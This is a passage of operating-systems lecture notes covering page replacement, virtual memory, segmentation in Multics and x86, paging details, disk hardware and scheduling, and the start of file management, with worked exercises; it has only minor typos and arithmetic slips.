In the flowchart below, the WS parameter (the size of the window in virtual time used to
determine whether a page is in the working set) is denoted by the Greek letter tau. The
parameter F is the number of frames--i.e., the size of physical memory divided by the
page size. Like CLOCK, WSClock walks through the frames in order, looking for a good
candidate for replacement, cleaning the reference bits as it goes. If the frame has been
referenced since it was last inspected, it is given a ``second chance''. (The counter LR[i]
is also updated to indicate that page has been referenced recently in terms of the virtual
time of its owner.) If not, the page is given a ``third chance'' by seeing whether it appears
to be in the working set of its owner.
67
Figure 5.9 CLOCK algorithm flowchart
The time since its last reference is approximately calculated by subtracting LR[i] from
the current (virtual) time. If the result is less than the parameter tau, the frame is passed
over. If the page fails this test, it is either used immediately or scheduled for cleaning
(writing its contents out to disk and clearing the dirty bit) depending on whether it is
clean or dirty. There is one final complication: If a frame is about to be passed over
because it was referenced recently, the algorithm checks whether the owning process is
active, and takes the frame anyhow if not. This extra check allows the algorithm to grab
the pages of processes that have been stopped by the load-control algorithm. Without it,
pages of stopped processes would never get any ``older'' because the virtual time of a
stopped process stops advancing.
Like CLOCK, WSClock has to be careful to avoid an infinite loop. As in the CLOCK
algorithm, it may may a complete circuit of the clock finding only dirty candidate pages.
In that case, it has to wait for one of the cleaning requests to finish. It may also find that
all pages are unreferenced but "new" (the reference bit is clear but the comparison to tau
shows the page has been referenced recently). In either case, memory is overcommitted
and some process needs to be stopped.
68
5.4 Virtual Memory
In accord with the beautification principle, paging makes the main memory of the computer look
more ``beautiful'' in several ways.

It gives each process its own virtual memory, which looks like a private version of the
main memory of the computer. In this sense, paging does for memory what the process
abstraction does for the CPU. Even though the computer hardware may have only one
CPU (or perhaps a few CPUs), each ``user'' can have his own private virtual CPU
(process). Similarly, paging gives each process its own virtual memory, which is separate
from the memories of other processes and protected from them.

Each virtual memory looks like a linear array of bytes, with addresses starting at zero.
This feature simplifies relocation: Every program can be compiled under the assumption
that it will start at address zero.

It makes the memory look bigger, by keeping infrequently used portions of the virtual
memory space of a process on disk rather than in main memory. This feature both
promotes more efficient sharing of the scarce memory resource among processes and
allows each process to treat its memory as essentially unbounded in size. Just as a process
doesn't have to worry about doing some operation that may block because it knows that
the OS will run some other process while it is waiting, it doesn't have to worry about
allocating lots of space to a rarely (or sparsely) used data structure because the OS will
only allocate real memory to the part that's actually being used.
5.5 Segmentation
Segmentation caries this feature one step further by allowing each process to have multiple
``simulated memories.'' Each of these memories (called a segment) starts at address zero, is
independently protected, and can be separately paged. In a segmented system, a memory address
has two parts: a segment number and a segment offset. Most systems have some sort of
segmentation, but often it is quite limited. UNIX has exactly three segments per process. One
segment (called the text segment) holds the executable code of the process. It is generally1 readonly, fixed in size when the process starts, and shared among all processes running the same
program. Sometimes read-only data (such as constents) are also placed in this segment. Another
segment (the data segment) holds the memory used for global variables. Its protection is
read/write (but usually not executable), and is normally not shared between processes. There is a
69
special system call to extend the size of the data segment of a process. The third segment is the
stack segment. As the name implies, it is used for the process' stack, which is used to hold
information used in procedure calls and returns (return address, saved contents of registers, etc.)
as well as local variables of procedures. Like the data segment, the stack is read/write but usually
not executable. The stack is automatically extended by the OS whenever the process causes a
fault by referencing an address beyond the current size of the stack (usually in the course of a
procedure call). It is not shared between processes. Some variants of UNIX have a fourth
segment, which contains part of the OS data structures. It is read-only and shared by all
processes.
Many application programs would be easier to write if they could have as many segments as they
liked. As an example of an application program that might want multiple segments, consider a
compiler. In addition to the usual text, data, and stack segments, it could use one segment for the
source of the program being compiled, one for the symbol table, etc. Breaking the address space
up into segments also helps sharing. For example, most programs in UNIX include the library
program printf. If the executable code of printf were in a separate segment, that segment could
easily be shared by multiple processes, allowing (slightly) more efficient sharing of physical
memory.
If you think of the virtual address as being the concatenation of the segment number and the
segment offset, segmentation looks superficially like paging. The main difference is that the
application programmer is aware of the segment boundaries, but can ignore the fact that the
address space is divided up into pages.
The implementation of segmentation is also superficially similar to the implementation of
paging. The segment number is used to index into a table of ``segment descriptors,'' each of
which contains the length and starting address of a segment as well as protection information. If
the segment offset not less than the segment length, the MMU traps with a segmentation
violation. Otherwise, the segment offset is added to the starting address in the descriptor to get
the resulting physical address. There are several differences between the implementation of
segments and pages, all derived from the fact that the size of a segment is variable, while the size
of a page is ``built-in.''

The size of the segment is stored in the segment descriptor and compared with the
segment offset. The size of a page need not be stored anywhere because it is always the
70
same. It is always a power of two and the page offset has just enough bits to represent
any legal offset, so it is impossible for the page offset to be out of bounds. For example,
if the page size is 4k (4096) bytes, the page offset is a 12-bit field, which can only contain
numbers in the range 0...4095.

The segment descriptor contains the physical address of the start of the segment. Since all
page frames are required to start at an address that is a multiple of the page size, which is
a power of two, the low-order bits of the physical address of a frame are always zero. For
example, if pages are 4k bytes, the physical address of each page frame ends with 12
zeros. Thus a page table entry contains a frame number, which is just the higher-order
bits of the physical address of the frame, and the MMU concatenates the frame number
with the page offset, as contrasted with adding the physical address of a segment with the
segment offset.
5.6 Implementation
Multics
One of the advantages of segmentation is that each segment can be large and can grow
dynamically. To get this effect, we have to page each segment. One way to do this is to have
each segment descriptor contain the (physical) address of a page table for the segment rather than
the address of the segment itself. This is the way segmentation works in Multics, the granddaddy
of all modern operating systems and a pioneer of the idea of segmentation. Multics ran on the
General Electric (later Honeywell) 635 computer, which was a 36-bit word-addressable machine,
which means that memory is divided into 36-bit words, with consecutive words having addresses
that differ by 1 (there were no bytes). A virtual address was 36 bits long, with the high 18 bits
interpreted as the segment number and the low 18 bits as segment offset. Although 18 bits allows
a maximum size of 218 = 262,144 words, the software enforced a maximum segment size of 216 =
65,536 words. Thus the segment offset is effectively 16 bits long. Associated with each process
is a table called the descriptor segment. There is a register called the Descriptor Segment Base
Register (DSBR) that points to it and a register called the Descriptor Segment Length Register
(DSLR) that indicates the number of entries in the descriptor segment.
71
Figure 5.10 Implementation of memory allocation in Multics
First the segment number in the virtual address is used to index into the descriptor segment to
find the appropriate descriptor. (If the segment number is too large, a fault occurs). The
descriptor contains permission information, which is checked to see if the current process has
rights to access the segment as requested. If that check succeeds, the memory address of a page
table for the segment is found in the descriptor. Since each page is 1024 words long, the 16-bit
segment offset is interpreted as a 6-bit page number and a 10-bit offset within the page. The page
number is used to index into the page table to get an entry containing a valid bit and frame
number. If the valid bit is set, the physical address of the desired word is found by concatenating
the frame number with the 10-bit page offset from the virtual address.
Actually, we have left out one important detail to simplify the description. The ``descriptor
segment'' really is a segment, which means it really is paged, just like any other segment. Thus
there is another page table that is the page table for the descriptor segment. The 18-bit segment
number from the virtual address is split into an 8-bit page number and a 10-bit offset. The page
number is used to select an entry from the descriptor segment's page table. That entry contains
the physical address of a page of the descriptor segment, and the page-offset field of the segment
number, is used to index into that page to get the descriptor itself. The rest of the translation
occurs as described in the preceding paragraph. In total, each memory reference turns into four
accesses to memory.

one to retrieve an entry from the descriptor segment's page table,

one to retrieve the descriptor itself,

one to retrieve an entry from the page table for the desired segment, and
72

One to load or store the desired data.
Multics used a TLB mapping the segment number and page number within the segment to a page
frame to avoid three of these accesses in most cases.
Intel x86
The Intex 386 (and subsequent members of the X86 family used in personal computers) uses a
different approach to combining paging with segmentation. A virtual address consists of a 16-bit
segment selector and a 16 or 32-bit segment offset. The selector is used to fetch a segment
descriptor from a table (actually, there are two tables and one of the bits of the selector is used to
choose which table). The 64-bit descriptor contains the 32-bit address of the segment (called the
segment base) 21 bits indicating its length, and miscellaneous bits indicating protections and
other options. The segment length is indicated by a 20-bit limit and one bit to indicate whether
the limit should be interpreted as bytes or pages. (The segment base and limit ``fields'' are
actually scattered around the descriptor to provide compatibility with earlier version of the
hardware.) If the offset from the original virtual address does not exceed the segment length, it is
added to the base to get a ``physical'' address called the linear address (see Fig 9.20 on page
292). If paging is turned off, the linear address really is the physical address. Otherwise, it is
translated by a two-level page table as described previously, with the 32-bit address divided into
two 10-bit page numbers and a 12 bit offset (a page is 4K on this machine).
We have to say ``generally'' here and elsewhere when we talk about UNIX because there are
many variants of UNIX in existence. Sometimes we will use the term ``classic UNIX'' to decribe
the features that were in UNIX before it spread to many distinct dialects. Features in classic
UNIX are generally found in all of its dialects. Sometimes features introduced in one variant
became so popular that they were widely imitated and are now available in most dialects.
This a good example of one of those ``popular'' features not in classic UNIX but in most modern
variants: System V (an AT&T variant of UNIX) introduced the ability to map a chunk of virtual
memory into the address spaces of multiple processes at some offset in the data segment
(perhaps a different offset in each process). This chunk is called a ``shared memory segment,''
but is not a segment in the sense we are using the term here. So-called ``System V shared
memory'' is available in most current versions of UNIX.
Many variants of UNIX get a similar effect with so-called ``shared libraries,'' which are
implemented with shared memory but without general-purpose segmentation support.
73
Paging Details
Real-world hardware CPUs have all sorts of ``features'' that make life hard for people trying to
write page-fault handlers in operating systems. Among the practical issues are the following.
Page Size
How big should a page be? This is really a hardware design question, but since it depends on OS
considerations, we will discuss it here. If pages are too large, lots of space will be wasted by
internal fragmentation: A process only needs a few bytes, but must take a full page. As a rough
estimate, about half of the last page of a process will be wasted on the average. Actually, the
average waste will be somewhat larger, if the typical process is small compared to the size of a
page. For example, if a page is 8K bytes and the typical process is only 1K, 7/8 of the space will
be wasted. Also, the relative amount of waste as a percentage of the space used depends on the
size of a typical process. All these considerations imply that as typical processes get bigger and
bigger, internal fragmentation becomes less and less of a problem.
On the other hand, with smaller pages it takes more page table entries to describe a given
process, leading to space overhead for the page tables, but more importantly time overhead for
any operation that manipulates them. In particular, it adds to the time needed to switch form one
process to another. The details depend on how page tables are organized. For example, if the
page tables are in registers, those registers have to be reloaded. A TLB will need more entries to
cover the same size ``working set,'' making it more expensive and require more time to re-load
the TLB when changing processes. In short, all current trends point to larger and larger pages in
the future.
If space overhead is the only consideration, it can be shown that the optimal size of a page is
sqrt(2se), where s is the size of an average process and e is the size of a page-table entry. This
calculation is based on balancing the space wasted by internal fragmentation against the space
used for page tables. This formula should be taken with a big grain of salt however, because it
overlooks the time overhead incurred by smaller pages.
Restarting the instruction
After the OS has brought in the missing page and fixed up the page table, it should restart the
process in such a way as to cause it to re-try the offending instruction. Unfortunately, that may
not be easy to do, for a variety of reasons.
74
Variable-length instructions
Some CPU architectures have instructions with varying numbers of arguments. For example the
Motorola 68000 has a move instruction with two arguments (source and target of the move). It
can cause faults for three different reasons: the instruction itself or either of the two operands.
The fault handler has to determine which reference faulted. On some computers, the OS has to
figure that out by interpreting the instruction and in effect simulating the hardware. The 68000
made it easier for the OS by updating the PC as it goes, so the PC will be pointing at the word
immediate following the part of the instruction that caused the fault. On the other hand, this
makes it harder to restart the instruction: How can the OS figure out where the instruction
started, so that it can back the PC up to retry?
Side effects
Some computers have addressing modes that automatically increment or decrement index
registers as a side effect, making it easy to simulate in one step the effect of the C statement
*p++ = *q++;. Unfortunately, if an instruction faults part-way through, it may be difficult to
figure out which registers have been modified so that they can be restored to their original state.
Some computers also have instructions such as ``move characters,'' which work on variablelength data fields, updating a pointer or count register. If an operand crosses a page boundary,
the instruction may fault part-way through, leaving a pointer or counter register modified.
Fortunately, most CPU designers know enough about operating systems to understand these
problems and add hardware features to allow the OS to recover. Either they undo the effects of
the instruction before faulting, or they dump enough information into registers somewhere that
the OS can undo them. The original 68000 did neither of these and so paging was not possible on
the 68000. It wasn't that the designers were ignorant of OS issues; it was just that there was not
enough room on the chip to add the features. However, one clever manufacturer built a box with
two 68000 CPUs and an MMU chip. The first CPU ran ``user'' code. When the MMU detected a
page fault, instead of interrupting the first CPU, it delayed responding to it and interrupted the
second CPU. The second CPU would run all the OS code necessary to respond to the fault and
then cause the MMU to retry the storage access. This time, the access would succeed and return
the desired result to the first CPU, which never realized there was a problem.
75
Locking Pages
There are a variety of cases in which the OS must prevent certain page frames from being chosen
by the page-replacement algorithm. For example, suppose the OS has chosen a particular frame
to service a page fault and sent a request to the disk scheduler to read in the page. The request
may take a long time to service, so the OS will allow other processes to run in the meantime. It
must be careful, however, that a fault by another process does not choose the same page frame!
A similar problem involves I/O. When a process requests an I/O operation it gives the virtual
address of the buffer the data is supposed to be read into or written out of. Since DMA devices
generally do not know anything about virtual memory, the OS translates the buffer address into a
physical memory location (a frame number and offset) before starting the I/O device. It would be
very embarrassing if the frame were chosen by the page-replacement algorithm before the I/O
operation completes. Both of these problems can be avoided by marking the frame a ineligible
for replacement. We usually say that the page in that frame is ``pinned'' in memory. An
alternative way of avoid the I/O problem is to do the I/O operation into or out of pages that
belong to the OS kernel (and are not subject to replacement) and copying between these pages
and user pages.
Missing Reference Bits
At least one popular computer, the Digital Equipment Corp. VAX computer, did not have any
REF bits in its MMU. Some people at the University of California at Berkeley came up with a
clever way of simulating the REF bits in software. Whenever the OS cleared the simulated REF
bit for a page, it mark the hardware page-table entry for the page as invalid. When the process
first referenced the page, it would cause a page fault. The OS would note that the page really was
in memory, so the fault handler could return without doing any I/O operations, but the fault
would give the OS the chance to turn the simulated REF bit on and mark the page as valid, so
subsequent references to the page would not cause page faults. Although the software simulated
hardware with a real real REF bit, the net result was that there was a rather high cost to clearing
the simulated REF bit. The people at Berkeley therefore developed a version of the CLOCK
algorithm that allowed them to clear the REF bit infrequently.
Fault Handling. Overall, the core of the OS kernel looks something like this:
// This is the procedure that gets called when an interrupt occurs
// on some computers, there is a different handler for each "kind"
// of interrupt.
void handler() {
save_process_state(current_PCB);
76
// Some state (such as the PC) is automatically saved by the HW.
// This code copies that info to the PCB and possibly saves some
// more state.
switch (what_caused_the_trap) {
case PAGE_FAULT:
f = choose_frame();
if (is_dirty(f))
schedule_write_request(f); // to clean the frame
else
schedule_read_request(f); // to read in requested page
record_state(current_PCB);
// to indicate what this process is up to
make_unrunnable(current_PCB);
current_PCB = select_some_other_ready_process();
break;
case IO_COMPLETION:
p = process_that_requested_the_IO();
switch (reason_for_the_IO) {
case PAGE_CLEANING:
schedule_read_request(f); to read in requested page
break;
case BRING_IN_NEW_PAGE:
case EXPLICIT_IO_REQUEST:
make_runnable(p);
break;
}
case IO_REQUEST:
schedule_io_request();
record_state(current_PCB);
// to indicate what this process is up to
make_unrunnable(current_PCB);
current_PCB = select_some_other_ready_process();
break;
case OTHER_OS_REQUEST:
perform_request();
break;
}
// At this point, the current_PCB is pointing to a process that
// is ready to run. It may or may not be the process that was
// running when the interrupt occurred.
restore_state(current_PCB);
return_from_interrupt(current_PCB);
// This hardware instruction restores the PC (and possibly other
// hardware state) and allows the indicated process to continue.
}
5.7 Exercise
1. Name two differences between logical and physical addresses.
Answer:
A logical address does not refer to an actual existing address; rather, it refers to an abstract
address in an abstract address space. Contrast this with a physical address that refers to an
actual physical address in memory. A logical address is generated by the CPU and is
77
translated into a physical address by the memory management unit (MMU). Therefore,
physical addresses are generated by the MMU.
2. Consider a system in which a program can be separated into two parts: code and data. The
CPU knows whether it wants an instruction (instruction fetch) or data (data fetch or store).
Therefore, two base–limit register pairs are provided: one for instructions and one for data.
The instruction base–limit register pair is automatically read-only, so programs can be shared
among different users. Discuss the advantages and disadvantages of this scheme.
Answer:
The major advantage of this scheme is that it is an effective mechanism for code and data
sharing. For example, only one copy of an editor or a compiler needs to be kept in memory,
and this code can be shared by all processes needing access to the editor or compiler code.
Another advantage is protection of code against erroneous modification.
The only disadvantage is that the code and data must be separated, which is usually adhered
to in a compiler -generated code.
3. Why are page sizes always powers of 2?
Answer:
Recall that paging is implemented by breaking up an address into a page and offset number.
It is most efficient to break the address into X page bits and Y offset bits, rather than perform
arithmetic on the address to calculate the page number and offset. Because each bit position
represents a power of 2, splitting an address between bits results in a page size that is a power
of 2.
4. Consider a logical address space of eight pages of 1024 words each, mapped onto a physical
memory of 32 frames.
(a) How many bits are there in the logical address?
(b) How many bits are there in the physical address?
Answer:
(a) Logical address: 13 bits
(b) Physical address: 15 bits
5. What is the effect of allowing two entries in a page table to point to the same page frame in
memory? Explain how this effect could be used to decrease the amount of time needed to
78
copy a large amount of memory from one place to another. What effect would updating some
byte on the one page have on the other page?
Answer:
By allowing two entries in a page table to point to the same page frame in memory, users can
share code and data. If the code is reentrant, much memory space can be saved through the
shared use of large programs such as text editors, compilers, and database systems.
“Copying” large amounts of memory could be affected by having different page tables point
to the same memory location. However, sharing of non reentrant code or data means that any
user having access to the code can modify it and these modifications would be reflected in
the other user’s “copy.”
79
80
6. Device Management
So far, we have covered how an operating system manages CPU and memory resources.
However, a computer is not so interesting without I/O devices (e.g., hard drives, network cards,
screen displays, keyboards, mice, rats, and so on). Device management is the part of the OS that
manages hardware devices. Device management tries to (1) provide a uniform interface to ease
the access to devices with different physical characteristics, and (2) optimize the performance of
individual devices.
6.1 I/O Devices
I/O devices can be roughly divided into two categories. A block device (e.g., disks) stores
information in fixed-size blocks, each one with its own address. A character device (e.g.,
keyboards, printers, network cards) delivers or accepts a stream of characters, and individual
characters are not addressable.
A device is connected to a computer through an electronic component, or a device controller,
which converts between the serial bit stream and a block of bytes and performs error correction if
necessary. Each controller has a few device registers that are used for communicating with the
CPU, and a data buffer that an OS can read or write. Since the number of device registers and
the natures of device instructions vary from device to device, a device driver OS component is
responsible hiding the complexity of an I/O device, so that the OS can access various devices in
a relatively uniform manner.
User level
User applications
Various OS components
OS level
Device drivers
Device controllers
Hardware
I/O devices
Figure 6.1 Structure of I/O system
81
6.2 Device Addressing
In general, there are two approaches to addressing these device registers and data buffers. The
first approach is to assign each device a dedicated range of device addresses in the physical
memory, so accessing those device addresses requires special hardware instructions associated
with individual devices. The second approach (memory-mapped I/O) is not to distinguish device
addresses from normal memory addresses, so devices can be accessed the same way as normal
memory, with the same set of hardware instructions.
Memory
addresses
Primary
memory
Device
addresses
Device 0
Memory
addresses
Device 1
Separate device addresses
Memory-mapped I/O
Figure 6.2 Device I/O addressing
6.3 Device Accesses
Regardless of the device addressing approach, the operating system has to track the status of a
device for exchanging data. The simplest approach is to use polling, where the CPU repeatedly
checks the status of a device for exchanging data.
However, wasting CPU cycles on busy-waiting is undesirable. A better approach is to use
interrupt-driven I/Os, where a device controller notifies the corresponding device driver when
the device is available. Although the interrupt-driven approach is much more efficient than
polling, the CPU is still actively involved in copying data between the device and memory.
Also, interrupt-driven I/Os still impose high overheads for character devices. For example, a
printer raises one interrupt per byte, so the overhead of interrupt far exceeds the cost of
transmitting a single byte.
An even better approach is to use an additional direct memory access (DMA) controller to
perform the actual movements of data, so the CPU can use the cycles for computation as
opposed to copying data.
82
The use of DMA alone still has room for improvement. Since a process cannot access the data
that is being brought into memory at the moment, due to mutual exclusion, a more efficient
approach is to pipeline the data transfer. The double buffering technique uses two buffers in the
following way: while one is being used, the other is being filled. Double buffering is also used
extensively for graphics and smooth animation. While the screen displays an image frame from
one buffer in the video controller, a separate buffer is being filled pixel-by-pixel in the
background, so a viewer does not see the line-by-line scanning on the screen.
Once the
background buffer is filled, the video controller switches the roles of the two buffers and displays
from the freshly filled buffer.
6.4 Overlapped I/O and CPU Processing
By freeing up CPU cycles while devices are serving requests, CPU-bound processes can be
executed concurrently with I/O-bound processes. For example, if process A is CPU-bound, and
process B is I/O-bound, the system as a whole can reach high utilization by overlapping CPU
and I/O processing effectively.
Process A
Loop:
90 msec of CPU
10 msec of I/O
A
Process B
Loop:
10 msec of CPU
90 msec of I/O
B
A
CPU
I/O
A
B
Figure 6.3 I/O and CPU processing
6.5 Disk as an Example Device
The hard disk is a 30-year-old storage technology, and is incredibly complicated. A modern hard
drive comes with 250,000 lines of micro code to govern various hard drive components.
Hardware Characteristics
Briefly, a hard drive consists of a disk arm and disk platters. Disk platters are coated with
magnetic materials for recording. The disk arm moves a comb of disk heads, among which only
one disk head is active for reading and writing.
83
One fascinating detail is that heads are aerodynamically designed to fly as close to the surface as
possible. In fact, the distance is so close that there is no room for air molecules, and a hard drive
is filled with special inert gas to fly disk heads. If a head touches the surface, it results in a head
crash, which scrapes off magnetic information.
Each disk platter is further divided into concentric tracks of storage, and each track is divided
into sectors (typically 512 bytes). Each sector is a minimum unit of disk storage. A cylinder
consists of all tracks with a given arm position.
Track
Disk platters
Disk arm
Sector
Figure 6.4 Configuration of Hard-disk
A modern hard drive also takes advantage of the disk geometry. Disk cylinders are further
grouped into zones, so zones near the edge of the disk can store more information than zones
near the center of the disk due to the differences in storage area (also known as zone-bit
recording). More information stored in outer zones also means that the transfer rate (rotational
speed multiplied by the information stored in a cylinder) is higher near the edge of the disk.
Since moving a disk arm from one track to the next takes time, the starting position of the next
track is slightly skewed (track skew), so that a sequential transfer of bytes across multiple tracks
can incur minimum rotational delay.
A hard drive also periodically performs therm-calibrations, which adjusts the disk head
positioning according to the changes in the disk radius caused by temperature changes. To
account for other minor physical inaccuracies, typically 100 to 1000 bits are inserted between
sectors.
A Simple Model of Disk Performance, the access time to read or write a disk section includes
three components:

Seek time: the time to position heads over a cylinder (~8 msec on average).
84

Rotational delay: the time to wait for the target sector to rotate underneath the head.
Assuming a speed of 7,200 rotations per minute, or 120 rotations per second, each
rotation takes ~8 msec, and the average rotational delay is ~4 msec.

Transfer time: the time to transfer bytes. Assuming a peak bandwidth of 58 Mbytes/sec,
transferring a disk block of 4 Kbytes takes 0.07 msec.
Thus, the overall time to perform a disk I/O = seek time + rotational delay + transfer time. The
sum of the seek time and the rotational delay is the disk latency, or the time to initiate a transfer.
The transfer rate is the disk bandwidth.
If a disk block is randomly placed on disk, then the disk access time is roughly 12 msec to fetch 4 Kbytes
of data, or a bandwidth 340 Kbytes/sec.
If a disk block is randomly located on the same disk cylinder as the current disk arm position, the access
time is roughly 4 msec without the seek time, or a bandwidth of 1.4 Mbytes/sec.
If the next sector is on the same track, the access time is 58 Mbytes/sec without the seek time and the
rotational delay.
Therefore, the key to using the hard drive effectively is to minimize the seek time and rotational
latency.
Disk Tradeoffs
One design decision is the size of disk sector.
Sector size Space utilization
1 byte
8 bits/1008 bits (0.8%)
4 Kbytes
4096 bytes/4221 bytes (97%)
1 Mbyte
(~100%)
Transfer rate
80 bytes/sec (1 byte / 12 msec)
340 Kbytes/sec (4 Kbytes / 12 msec)
58 Mbytes/sec (peak bandwidth)
Table 6.1 Wasteful allocation of disk space
A bigger sector size seems to get a more effective transfer rate from the hard drive. However,
this allocation granularity is wasteful if only 1 byte out of 1 Mbyte is needed for storage.
6.6 Disk Controller and Disk Device Driver
Two popular disk controllers are SCSI (small computer systems interface), and IDE (integrated
device electronics). Since they are not a part of the OS, please surf the net for more information.
One major function of the disk device driver is to reduce the seek time for disk accesses. Since
disk can serve only one request at a time, the device driver can schedule the disk request in such
a way to minimize disk arm movements. There are a handful of disk scheduling strategies.
Please read Nutt’s book for detailed examples.
FIFO
85
Requests are served in the order of arrival. This policy is fair among requesters, but requests
may land on random spots on disk. Therefore, the seek time may be long.
SSTF (Shortest Seek Time First)
The shortest seek time first approach picks the request that is closest to the current disk arm
position. (Although called the shortest seek time first, this approach actually includes the
rotational delay in calculation, since rotation can be as long as seek.) SSTF is good at reducing
seeks, but may result in starvation.
SCAN
SCAN implements an elevator algorithm. It takes the closet request in the direction of travel. It
guarantees no starvation, but retains the flavor of SSTF. However, if a disk is heavily loaded
with requests, a new request at a location that has been just recently scanned can wait for almost
two full scans of the disk.
C-SCAN (Circular SCAN)
For C-SCAN, the disk arm always serves requests by scanning in one direction. Once the arm
finishes scanning for one direction, it quickly returns to the 0th track for the next round of
scanning.
6.7 Exercises
1. The accelerating seek described in Exercise 12.3 is typical of hard-disk drives. By contrast,
floppy disks (and many hard disks manufactured before the mid-1980s) typically seek at a
fixed rate. Suppose that the disk in Exercise 12.3 has a constant-rate seek rather than a
constant acceleration seek, so the seek time is of the form t = x + yL, where t is the time in
milliseconds and L is the seek distance. Suppose that the time to seek to an adjacent cylinder
is 1 millisecond, as before, and is 0.5 milliseconds for each additional cylinder.
(a) Write an equation for this seek time as a function of the seek distance.
(b) Using the seek-time function from part a, calculate the total seek time for each of the
schedules in Exercise 12.2. Is your answer the same as it was for Exercise 12.3(c)?
(c) What is the percentage speedup of the fastest schedule over FCFS in this case?
Answer:
(a) The equation is t = 0.95 + 0.05L
86
(b) FCFS 362.60; SSTF 95.80; SCAN 497.95; LOOK 174.50; C-SCAN 500.15; (and CLOOK 176.70). SSTF is still the winner, and LOOK is the runner-up.
(c) (362.60 − 95.80)/362.60 = 0.74 The percentage speedup of SSTF over FCFS is 74%, with
respect to the seek time. If we include the overhead of rotational latency and data transfer, the
percentage speedup will be less.
2. Is disk scheduling, other than FCFS scheduling, useful in a single-user environment? Explain
your answer.
Answer:
In a single-user environment, the I/O queue usually is empty. Requests generally arrive from
a single process for one block or for a sequence of consecutive blocks. In these cases, FCFS
is an economical method of disk scheduling. But LOOK is nearly as easy to program and will
give much better performance when multiple processes are performing concurrent I/O, such
as when a Web browser retrieves data in the background while the operating system is
paging and another application is active in the foreground.
3. Explain why SSTF scheduling tends to favor middle cylinders over the innermost and
outermost cylinders.
Answer:
The center of the disk is the location having the smallest average distance to all other tracks.
Thus the disk head tends to move away from the edges of the disk. Here is another way to
think of it. The current location of the head divides the cylinders into two groups. If the head
is not in the center of the disk and a new request arrives, the new request is more likely to be
in the group that includes the center of the disk; thus, the head is more likely to move in that
direction.
4. Why rotational latency is usually not considered in disk scheduling? How would you modify
SSTF, SCAN, and C-SCAN to include latency optimization?
Answer:
Most disks do not export their rotational position information to the host. Even if they did,
the time for this information to reach the scheduler would be subject to imprecision and the
time consumed by the scheduler is variable, so the rotational position information would
87
become incorrect. Further, the disk requests are usually given in terms of logical block
numbers, and the mapping between logical blocks and physical locations is very complex.
5. How would use of a RAM disk affect your selection of a disk-scheduling algorithm? What
factors would you need to consider? Do the same considerations apply to hard-disk
scheduling, given that the file system stores recently used blocks in a buffer cache in main
memory?
Answer:
Disk scheduling attempts to reduce the overhead time of disk head positioning. Since a RAM
disk has uniform access times, scheduling is largely unnecessary. The comparison between
RAM disk and the main memory disk-cache has no implications for hard-disk scheduling
because we schedule only the buffer cache misses, not the requests that find their data in
main memory.
6. Why is it important to balance file system I/O among the disks and controllers on a system in
a multitasking environment?
Answer:
A system can perform only at the speed of its slowest bottleneck. Disks or disk controllers
are frequently the bottleneck in modern systems as their individual performance cannot keep
up with that of the CPU and system bus. By balancing I/O among disks and controllers,
neither an individual disk nor a controller is overwhelmed, so that bottleneck is avoided.
88
7. File Management
7.1 General Concepts
Just as the process abstraction beautifies the hardware by making a single CPU (or a small
number of CPUs) appear to be many CPUs, one per ``user,'' the file system beautifies the
hardware disk, making it appear to be a large number of disk-like objects called files. Like a disk,
a file is capable of storing a large amount of data cheaply, reliably, and persistently. The fact that
there are lots of files is one form of beautification: Each file is individually protected, so each
user can have his own files, without the expense of requiring each user to buy his own disk. Each
user can have lots of files, which makes it easier to organize persistent data. The file system also
makes each individual file more beautiful than a real disk. At the very least, it erases block
boundaries, so a file can be any length (not just a multiple of the block size) and programs can
read and write arbitrary regions of the file without worrying about whether they cross block
boundaries. Some systems (not UNIX) also provide assistance in organizing the contents of a
file.
Systems use the same sort of device (a disk drive) to support both virtual memory and files. The
question arises why these have to be distinct facilities, with vastly different user interfaces. The
answer is that they don't. In Multics, there was no difference whatsoever. Everything in Multics
was a segment. The address space of each running process consisted of a set of segments (each
with its own segment number), and the ``file system'' was simply a set of named segments. To
access a segment from the file system, a process would pass its name to a system call that
assigned a segment number to it. From then on, the process could read and write the segment
simply by executing ordinary loads and stores. For example, if the segment was an array of
integers, the program could access the ith number with a notation like a[i] rather than having to
seek to the appropriate offset and then execute a read system call. If the block of the file
containing this value wasn't in memory, the array access would cause a page fault, which was
serviced as explained in the previous chapter.
This user-interface idea, sometimes called ``single-level store,'' is a great idea. So why is it not
common in current operating systems? In other words, why are virtual memory and files
presented as very different kinds of objects? There are possible explanations one might propose:
The address space of a process is small compared to the size of a file system.
89
There is no reason why this has to be so. In Multics, a process could have up to 256K segments,
but each segment was limited to 64K words. Multics allowed for lots of segments because every
``file'' in the file system was a segment. The upper bound of 64K words per segment was
considered large by the standards of the time; The hardware actually allowed segments of up to
256K words (over one megabyte). Most new processors introduced in the last few years allow
64-bit virtual addresses. In a few years, such processors will dominate. So there is no reason why
the virtual address space of a process cannot be large enough to include the entire file system.
The virtual memory of a process is transient--it goes away when the process terminates--while
files must be persistent.
Multics showed that this doesn't have to be true. A segment can be designated as ``permanent,''
meaning that it should be preserved after the process that created it terminates. Permanent
segments to raise a need for one ``file-system-like'' facility, the ability to give names to segments
so that new processes can find them.
Files are shared by multiple processes, while the virtual address space of a process is associated
with only that process.
Most modern operating systems (including most variants of UNIX) provide some way for
processes to share portions of their address spaces anyhow, so this is a particularly weak
argument for a distinction between files and segments.
The real reason single-level store is not ubiquitous is probably a concern for efficiency. The
usual file-system interface encourages a particular style of access: Open a file, go through it
sequentially, copying big chunks of it to or from main memory, and then close it. While it is
possible to access a file like an array of bytes, jumping around and accessing the data in tiny
pieces, it is awkward. Operating system designers have found ways to implement files that make
the common ``file like'' style of access very efficient. While there appears to be no reason in
principle why memory-mapped files cannot be made to give similar performance when they are
accessed in this way, in practice, the added functionality of mapped files always seems to pay a
price in performance. Besides, if it is easy to jump around in a file, applications programmers
will take advantage of it, overall performance will suffer, and the file system will be blamed.
90
Naming
Every file system provides some way to give a name to each file. We will consider only names
for individual files here, and talk about directories later. The name of a file is (at least
sometimes) meant to be used by human beings, so it should be easy for humans to use. Different
operating systems put different restrictions on names.
Size
Some systems put severe restrictions on the length of names. For example DOS restricts names
to 11 characters, while early versions of UNIX (and some still in use today) restrict names to 14
characters. The Macintosh operating system, Windows 95, and most modern version of UNIX
allow names to be essentially arbitrarily long. We say ``essentially'' since names are meant to be
used by humans, so they don't really to to be all that long. A name that is 100 characters long is
just as difficult to use as one that it forced to be under 11 characters long (but for different
reasons). Most modern versions of UNIX, for example, restrict names to a limit of 255
characters.1
Case
Are upper and lower case letters considered different? The UNIX tradition is to consider the
names Foo and foo to be completely different and unrelated names. In DOS and its descendants,
however, they are considered the same. Some systems translate names to one case (usually upper
